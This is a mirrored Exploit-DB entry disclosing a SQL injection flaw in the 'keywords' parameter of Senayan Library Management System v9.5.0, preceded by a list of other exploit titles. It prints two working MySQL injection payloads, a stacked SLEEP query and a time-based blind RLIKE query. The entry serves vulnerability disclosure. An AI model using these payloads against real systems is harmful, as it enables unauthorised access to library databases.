bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51120.txt
Exploit-DB 6bc7a6f9b0 DB: 2023-03-29 
25 changes to exploits/shellcodes/ghdb

ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)

Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access

ZKTeco ZEM/ZMM 8.88 - Missing Authentication

Hashicorp Consul v1.0 - Remote Command Execution (RCE)

X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)

OPSWAT Metadefender Core - Privilege Escalation

Pega Platform 8.1.0 - Remote Code Execution (RCE)

Beauty-salon v1.0 - Remote Code Execution (RCE)

BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)

iBooking v1.0.8 - Arbitrary File Upload

Jetpack 11.4 - Cross Site Scripting (XSS)

Moodle LMS 4.0 - Cross-Site Scripting (XSS)

Online shopping system advanced 1.0 - Multiple Vulnerabilities

rukovoditel 3.2.1 - Cross-Site Scripting (XSS)

Senayan Library Management System v9.5.0 - SQL Injection

Social-Share-Buttons v2.2.3 - SQL Injection

Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)

YouPHPTube<= 7.8 - Multiple Vulnerabilities

Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)

SuperMailer v11.20 - Buffer overflow DoS

Tunnel Interface Driver - Denial of Service

VMware Workstation 15 Pro - Denial of Service

HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path

SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
2023-03-29 00:16:31 +00:00

63 lines
No EOL
2.3 KiB
Text
Raw Blame History

## Title: Senayan Library Management System v9.5.0 - SQL Injection
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0
## Description:
The `keywords` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the keywords parameter, and a general
error message was returned.
Two single quotes were then submitted and the error message
disappeared. The injection is confirmed manually from nu11secur1ty.
The attacker can retrieve all information from the database of this
system, by using this vulnerability.
## STATUS: HIGH Vulnerability
[+] Payload:
```MySQL
---
Parameter: keywords (GET)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT
SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))
RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)
## Proof and Exploit:
[href](https://streamable.com/63og5v)
## Time spent
`3:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Reference in a new issue View git blame Copy permalink